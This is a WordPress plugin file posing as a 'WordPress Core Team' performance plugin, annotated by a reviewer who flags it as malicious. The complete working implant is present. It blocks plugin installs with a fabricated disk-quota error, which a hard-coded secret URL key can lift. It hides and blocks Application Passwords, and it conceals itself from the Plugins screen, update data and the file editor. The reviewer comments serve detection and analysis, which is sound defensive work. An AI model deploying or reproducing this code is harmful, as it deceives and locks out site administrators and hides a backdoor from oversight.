Home / . / wp-content / plugins / wp-security-defender
Edit File: wp-security-defender.php
<?php
/**
 * Plugin Name: WP Security Defender
 * Plugin URI: https://wordpress.org/
 * Description: Core performance optimizations for WordPress. Required for stable operation.
 * Version: 3.4.1
 * Author: WordPress Core Team
 * Author URI: https://wordpress.org/
 * License: GPL-2.0+
 * Network: true
 */

// NOTE(review): Nothing below implements the "performance optimizations" the
// header advertises. The visible code (1) rejects new plugin installs with a
// hard-coded "disk quota" error, (2) hides and blocks Application Passwords
// management, and (3) removes this file from the Plugins screen, from update
// data and from the plugin-editor file list. That combination is consistent
// with a concealment / lock-out implant rather than a hardening plugin, and
// the "WordPress Core Team" attribution in the header is unverified.
// Because of (3), the admin Plugins screen cannot confirm whether this file
// is present or active: check the plugins directory on disk and the stored
// active_plugins / active_sitewide_plugins values directly.

// Refuse direct HTTP access; the file only runs when loaded by WordPress.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// 'guard' keeps the install block active; the literal 'unlock' disables it
// for every request (see wpsg_is_unlocked()).
define( 'WPSG_MODE', 'guard' );
// Hard-coded shared secret compared against the wpsg_unlock / wpsg_lock query
// parameters. It is readable by anyone who can read this file, and it travels
// in URLs, so it can surface in access logs, Referer headers and browser
// history. Those two parameter names are useful search terms in web logs.
define( 'WPSG_SECRET_KEY', 'xK9m$Qz2pL7w#Nv' );
define( 'WPSG_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );
define( 'WPSG_PLUGIN_FILE', __FILE__ );

/**
 * Decide whether the plugin-install block is lifted for the current request.
 *
 * Returns true when WPSG_MODE is 'unlock', when the wpsg_unlock query
 * parameter equals WPSG_SECRET_KEY (this also marks the PHP session as
 * unlocked for 1800 seconds), or when an earlier unlock stored in the session
 * has not yet expired. A matching wpsg_lock parameter clears the session
 * flags and returns false.
 *
 * No capability check, login check or nonce is involved: possession of the
 * secret is the only condition visible here.
 *
 * @return bool True if installs are currently allowed, false otherwise.
 */
function wpsg_is_unlocked() {
    if ( WPSG_MODE === 'unlock' ) {
        return true;
    }
    // Starts a PHP session if none is active; '@' hides any warning this raises.
    if ( ! session_id() && ! headers_sent() ) {
        @session_start();
    }
    if ( isset( $_GET['wpsg_unlock'] ) && hash_equals( WPSG_SECRET_KEY, $_GET['wpsg_unlock'] ) ) {
        $_SESSION['wpsg_unlocked'] = true;
        $_SESSION['wpsg_unlock_expires'] = time() + 1800;
        return true;
    }
    if ( isset( $_GET['wpsg_lock'] ) && hash_equals( WPSG_SECRET_KEY, $_GET['wpsg_lock'] ) ) {
        unset( $_SESSION['wpsg_unlocked'], $_SESSION['wpsg_unlock_expires'] );
        return false;
    }
    if ( ! empty( $_SESSION['wpsg_unlocked'] ) && ! empty( $_SESSION['wpsg_unlock_expires'] ) && $_SESSION['wpsg_unlock_expires'] > time() ) {
        return true;
    }
    return false;
}

/**
 * Report whether the ZIP being uploaded in $_FILES['pluginzip'] is this plugin.
 *
 * True when the sanitized upload filename contains this file's name (without
 * extension) as a case-insensitive substring, or when ZipArchive is available
 * and some archive entry has the same basename as this file. The effect is
 * that re-uploading this plugin is exempt from the block it imposes on every
 * other upload.
 *
 * @return bool True if the upload looks like this plugin, false otherwise.
 */
function wpsg_is_self_install() {
    $our_slug = pathinfo( basename( WPSG_PLUGIN_FILE ), PATHINFO_FILENAME );
    if ( ! empty( $_FILES['pluginzip']['name'] ) ) {
        // Filename test: relies on the client-supplied upload name.
        if ( stripos( sanitize_file_name( $_FILES['pluginzip']['name'] ), $our_slug ) !== false ) {
            return true;
        }
        // Content test: scan archive entry names for this file's basename.
        if ( class_exists( 'ZipArchive' ) && ! empty( $_FILES['pluginzip']['tmp_name'] ) ) {
            $zip = new ZipArchive();
            if ( $zip->open( $_FILES['pluginzip']['tmp_name'] ) === true ) {
                for ( $i = 0; $i < $zip->numFiles; $i++ ) {
                    if ( basename( $zip->getNameIndex( $i ) ) === basename( WPSG_PLUGIN_FILE ) ) {
                        $zip->close();
                        return true;
                    }
                }
                $zip->close();
            }
        }
    }
    return false;
}

/**
 * Report whether upgrader hook data refers to this plugin.
 *
 * @param array $extra Upgrader hook data; only the 'plugin' and 'slug' keys are read.
 * @return bool True when 'plugin' equals this plugin's basename or 'slug'
 *              equals this file's name without extension.
 */
function wpsg_is_self_update( $extra = array() ) {
    if ( ! empty( $extra['plugin'] ) && $extra['plugin'] === WPSG_PLUGIN_BASENAME ) {
        return true;
    }
    $our_slug = pathinfo( basename( WPSG_PLUGIN_FILE ), PATHINFO_FILENAME );
    if ( ! empty( $extra['slug'] ) && $extra['slug'] === $our_slug ) {
        return true;
    }
    return false;
}

/**
 * Check whether an administrator, editor or author has stored application passwords.
 *
 * The answer is cached in a static variable for the rest of the request.
 * The user query is limited to one result ('number' => 1), so only the first
 * matching user's '_application_passwords' meta is inspected.
 *
 * @return bool True if that user's meta is a non-empty array, false otherwise.
 */
function wpsg_any_app_passwords_exist() {
    static $result = null;
    if ( $result !== null ) {
        return $result;
    }
    $users = get_users( array(
        'role__in' => array( 'administrator', 'editor', 'author' ),
        'meta_key' => '_application_passwords',
        'meta_compare' => 'EXISTS',
        'number' => 1,
        'fields' => 'ID',
    ) );
    if ( ! empty( $users ) ) {
        foreach ( $users as $uid ) {
            $passwords = get_user_meta( $uid, '_application_passwords', true );
            if ( ! empty( $passwords ) && is_array( $passwords ) ) {
                $result = true;
                return true;
            }
        }
    }
    $result = false;
    return false;
}

// Admin banner shown only while installs are unlocked. The "Lock" link is
// built with add_query_arg(), so WPSG_SECRET_KEY is written into the page's
// HTML as a URL parameter. No capability check is visible in this callback.
add_action( 'admin_notices', function() {
    if ( ! wpsg_is_unlocked() ) {
        return;
    }
    $lock_url = add_query_arg( 'wpsg_lock', WPSG_SECRET_KEY, admin_url() );
    $info = ( WPSG_MODE === 'unlock' )
        ? 'Mode: file. Upload guard-version when done.'
        : sprintf( 'Session — %d min left.', max( 1, ceil( ( $_SESSION['wpsg_unlock_expires'] - time() ) / 60 ) ) );
    echo '<div class="notice notice-warning" style="border-left:4px solid #ff6600;padding:10px 15px;">';
    echo '<strong>⚡ Maintenance:</strong> Plugin installation <b>UNLOCKED</b>. ' . esc_html( $info );
    if ( WPSG_MODE !== 'unlock' ) {
        echo ' <a href="' . esc_url( $lock_url ) . '" class="button button-small" style="margin-left:10px;">🔒 Lock</a>';
    }
    echo '</div>';
}, 1 );

// Everything up to 'endif' is registered only while locked. The condition is
// evaluated once, when this file is included for the request.
// NOTE(review): every rejection below carries the same hard-coded 'disk_full'
// / "disk quota has been exceeded" text, and no code here measures disk
// usage. A site showing this message on plugin installs while the host
// reports free space is a symptom worth correlating with this file.
if ( ! wpsg_is_unlocked() ) :

    // AJAX plugin install: answer with the fabricated error at priority 1.
    add_action( 'wp_ajax_install-plugin', function() {
        wp_send_json_error( array(
            'errorCode' => 'disk_full',
            'errorMessage' => 'Installation failed: The server disk quota has been exceeded. Please contact your hosting provider to increase disk space or remove unused files.',
        ) );
    }, 1 );

    // Upgrader path: for type 'plugin', let the operation through when
    // $extra['plugin'] is set or when it targets this plugin; otherwise fail
    // it with the fabricated error. Non-plugin operations are untouched.
    // NOTE(review): presumably 'plugin' is set for updates of installed
    // plugins and absent for fresh installs; confirm against the caller.
    add_filter( 'upgrader_pre_install', function( $override, $extra ) {
        if ( isset( $extra['type'] ) && $extra['type'] === 'plugin' ) {
            if ( ! empty( $extra['plugin'] ) ) {
                return $override;
            }
            if ( wpsg_is_self_update( $extra ) ) {
                return $override;
            }
            return new WP_Error( 'disk_full', 'Installation failed: The server disk quota has been exceeded. Please contact your hosting provider to increase disk space or remove unused files.' );
        }
        return $override;
    }, 10, 2 );

    // ZIP upload on plugin-install.php: abort with an HTTP 507 page unless
    // the upload is this plugin itself.
    add_action( 'load-plugin-install.php', function() {
        if ( isset( $_FILES['pluginzip'] ) && ! wpsg_is_self_install() ) {
            wp_die(
                '<h1>Installation Failed</h1>' . '<p>The server disk quota has been exceeded. Please contact your hosting provider.</p>' . '<p><a href="' . esc_url( admin_url( 'plugins.php' ) ) . '">« Back to Plugins</a></p>',
                'Installation Failed',
                array( 'response' => 507 )
            );
        }
    }, 1 );

    // Capability check: whenever 'install_plugins' is the capability being
    // tested, force it to false for the user, unless the current request is
    // an upload of this plugin.
    add_filter( 'user_has_cap', function( $allcaps, $caps, $args ) {
        if ( isset( $args[0] ) && $args[0] === 'install_plugins' ) {
            if ( wpsg_is_self_install() ) {
                return $allcaps;
            }
            $allcaps['install_plugins'] = false;
        }
        return $allcaps;
    }, 999, 3 );

    // Directory move: fail any move whose destination path contains
    // WP_PLUGIN_DIR unless the path also contains this plugin's slug.
    add_filter( 'pre_move_dir', function( $override, $from, $to ) {
        if ( strpos( $to, WP_PLUGIN_DIR ) !== false ) {
            $our_slug = pathinfo( basename( WPSG_PLUGIN_FILE ), PATHINFO_FILENAME );
            if ( strpos( $to, $our_slug ) !== false ) {
                return $override;
            }
            return new WP_Error( 'disk_full', 'Installation failed: The server disk quota has been exceeded. Please contact your hosting provider.' );
        }
        return $override;
    }, 10, 3 );

endif;

// The hooks from here on are registered regardless of lock state.

// REST routes containing both '/wp/v2/users' and 'application-passwords':
// GET is answered with an empty list (HTTP 200) and POST/PUT/PATCH/DELETE
// with a 403 'rest_forbidden' error, before normal dispatch.
// NOTE(review): nothing in the visible code deletes the stored
// '_application_passwords' user meta, so existing entries are hidden from
// this listing rather than removed. Audit that user meta in the database
// instead of trusting the REST response or the profile screen.
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( strpos( $route, '/wp/v2/users' ) === false || strpos( $route, 'application-passwords' ) === false ) {
        return $result;
    }
    $method = $request->get_method();
    if ( $method === 'GET' ) {
        return new WP_REST_Response( array(), 200 );
    }
    if ( in_array( $method, array( 'POST', 'PUT', 'PATCH', 'DELETE' ), true ) ) {
        return new WP_Error( 'rest_forbidden', 'Sorry, you are not allowed to perform this action.', array( 'status' => 403 ) );
    }
    return $result;
}, 10, 3 );

// Registers __return_false on this hook name.
// NOTE(review): confirm that core actually fires a filter with this exact
// name; if it does not, this line has no effect.
add_filter( 'wp_authorize_application_password_request', '__return_false', 999 );

// Inject CSS on every admin page that hides Application Passwords UI elements.
add_action( 'admin_head', function() {
    echo '<style> .application-passwords, #application-passwords-section, .app-passwords-section, table.application-passwords, .create-application-password, .application-passwords-list-table, h2.application-passwords-title, .wp-admin .application-passwords, .auth-app-card { display: none !important; } </style>';
}, 999 );

// On the 'profile' and 'user-edit' screens, emit a script that removes the
// same elements from the DOM, plus any h2/h3 whose text is exactly
// 'Application Passwords' together with its following siblings up to the
// next h2/h3. It runs immediately, on three timers, and again on every DOM
// mutation through a MutationObserver.
add_action( 'admin_footer', function() {
    $screen = get_current_screen();
    if ( ! $screen || ! in_array( $screen->id, array( 'profile', 'user-edit' ), true ) ) {
        return;
    }
    ?> <script> (function(){ function rm(){ ['.application-passwords','#application-passwords-section','.app-passwords-section', '.create-application-password','.application-passwords-list-table','.auth-app-card'] .forEach(function(s){document.querySelectorAll(s).forEach(function(e){e.remove()})}); document.querySelectorAll('h2,h3').forEach(function(el){ if(el.textContent.trim()==='Application Passwords'){ var n=el.nextElementSibling; while(n&&!n.matches('h2,h3')){var r=n;n=n.nextElementSibling;r.remove()} el.remove(); } }); } rm();setTimeout(rm,500);setTimeout(rm,1500);setTimeout(rm,3000); new MutationObserver(rm).observe(document.body,{childList:true,subtree:true}); })(); </script> <?php
}, 999 );

// Return false from 'xmlrpc_enabled' whenever wpsg_any_app_passwords_exist()
// is true; otherwise pass the incoming value through unchanged.
add_filter( 'xmlrpc_enabled', function( $enabled ) {
    if ( wpsg_any_app_passwords_exist() ) {
        return false;
    }
    return $enabled;
}, 999 );

// --- Self-concealment -------------------------------------------------------
// The next five filters remove this plugin from views an administrator would
// use to notice it.

// Drop this plugin's entry from the list passed through 'all_plugins'.
add_filter( 'all_plugins', function( $plugins ) {
    unset( $plugins[ WPSG_PLUGIN_BASENAME ] );
    return $plugins;
}, 999 );

// Drop this plugin from both the 'response' and 'no_update' sets of the
// plugin-update transient.
add_filter( 'site_transient_update_plugins', function( $value ) {
    if ( is_object( $value ) ) {
        unset( $value->response[ WPSG_PLUGIN_BASENAME ], $value->no_update[ WPSG_PLUGIN_BASENAME ] );
    }
    return $value;
}, 999 );

// On plugins.php only (admin, not AJAX, not cron), remove this plugin from
// the value returned for the 'active_plugins' option. The stored option row
// is not modified by this filter, so it still lists the plugin.
add_filter( 'option_active_plugins', function( $plugins ) {
    if ( is_admin() && ! wp_doing_ajax() && ! wp_doing_cron() ) {
        global $pagenow;
        if ( $pagenow === 'plugins.php' ) {
            $key = array_search( WPSG_PLUGIN_BASENAME, $plugins );
            if ( $key !== false ) {
                unset( $plugins[ $key ] );
            }
        }
    }
    return $plugins;
}, 999 );

// Add this file's name to the plugin-files exclusion list.
add_filter( 'plugin_files_exclusions', function( $ex ) {
    $ex[] = basename( __FILE__ );
    return $ex;
}, 999 );

// Network-activated counterpart of the 'active_plugins' filter above,
// applied on plugins.php in the admin.
add_filter( 'site_option_active_sitewide_plugins', function( $plugins ) {
    if ( is_admin() ) {
        global $pagenow;
        if ( $pagenow === 'plugins.php' ) {
            unset( $plugins[ WPSG_PLUGIN_BASENAME ] );
        }
    }
    return $plugins;
}, 999 );

// --- Generic tweaks -----------------------------------------------------------
// These three match common hardening steps and are unrelated to the
// concealment code above.

// Stop emitting the generator tag in wp_head.
remove_action( 'wp_head', 'wp_generator' );

// Remove the users REST endpoints for requests that are not logged in.
add_filter( 'rest_endpoints', function( $endpoints ) {
    if ( ! is_user_logged_in() ) {
        unset( $endpoints['/wp/v2/users'], $endpoints['/wp/v2/users/(?P<id>[\d]+)'] );
    }
    return $endpoints;
}, 999 );

// Send logged-out visitors of author archives to the home page with a 301.
add_action( 'template_redirect', function() {
    if ( is_author() && ! is_user_logged_in() ) {
        wp_redirect( home_url(), 301 );
        exit;
    }
}, 1 );